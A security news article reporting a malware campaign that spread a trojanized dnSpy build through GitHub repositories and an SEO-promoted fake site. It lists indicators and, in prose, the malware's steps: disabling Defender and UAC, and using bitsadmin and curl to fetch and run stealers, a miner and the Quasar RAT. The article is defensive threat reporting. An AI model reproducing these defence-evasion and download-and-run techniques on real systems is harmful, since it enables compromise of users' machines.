In a complex malware campaign, hackers targeted cybersecurity experts and developers, distributing a malicious version of the dnSpy .NET app to deploy cryptocurrency stealers, miners, and remote access trojans.
dnSpy is a widespread debugger and .NET assembly editor used for debugging, modifying, and decompiling .NET programs. Security experts often use this program when analyzing .NET malware and applications. While the original creators are no longer actively developing the program, the original source code and a new actively developed version are accessible on GitHub for anybody to clone and modify.
A threat actor recently posted a GitHub repository with a developed version of dnSpy that installs a slew of malware, including cryptocurrency-stealing clipboard hijackers, the Quasar remote access trojan, a miner, and a range of unknown payloads. According to security researchers 0day enthusiast and MalwareHunterTeam, the malicious dnSpy project was initially hosted at https://github[.]com/carbonblackz/dnSpy/ and then switched to https://github[.]com/isharpdev/dnSpy to seem more plausible.
The threat actors also developed a well-designed and professional-looking website at dnSpy[.]net, however, this site is currently down. To advertise the website, the threat actors used an effective search engine optimization strategy to place dnSpy[.]net on Google’s first page. Bing, Yahoo, AOL, Yandex, and Ask.com displayed this domain highly. They also took out search engine advertising to appear as the first thing in search results as a backup strategy.
When the malicious dnSpy application is run, it seems to be legitimate software. It enables you to open.NET apps, debug them, and execute all of the program’s typical operations. When the malicious dnSpy app [VirusTotal] is opened, it will conduct a sequence of instructions to generate scheduled tasks with enhanced permissions.
According to a list of commands provided by MalwareHunterTeam, the malware performs the following operations:
- Disables Microsoft Defender
- Uses bitsadmin.exe to download curl.exe to %windir%\system32\curl.exe
- Uses curl.exe and bitsadmin.exe to download a variety of payloads to the C:\Trash folder and launch them
- Disables User Account Control
The payloads may be obtained at http://4api[.]net/ and include the following malware:
- %windir%\system32\curl.exe – The curl program
- C:\Trash\ck.exe – Unknown
- C:\Trash\c.exe – Unknown [VirusTotal]
- C:\Trash\cbo.exe – Unknown [VirusTotal]
- C:\Trash\cbot.exe – Clipboard Hijacker [VirusTotal]
- C:\Trash\m.exe – Miner [VirusTotal]
- C:\Trash\qs.exe – Quasar RAT [VirusTotal]
- C:\Trash\nnj.exe – Unknown
- C:\Trash\d.exe – Legitimate Defender Control application to disable Microsoft Defender [VirusTotal]
Both the dnSpy[.]net and the GitHub repository used to power this campaign are now unavailable. On the other hand, security researchers and developers must be on the watch for malicious clones of famous projects that infect their devices with malware.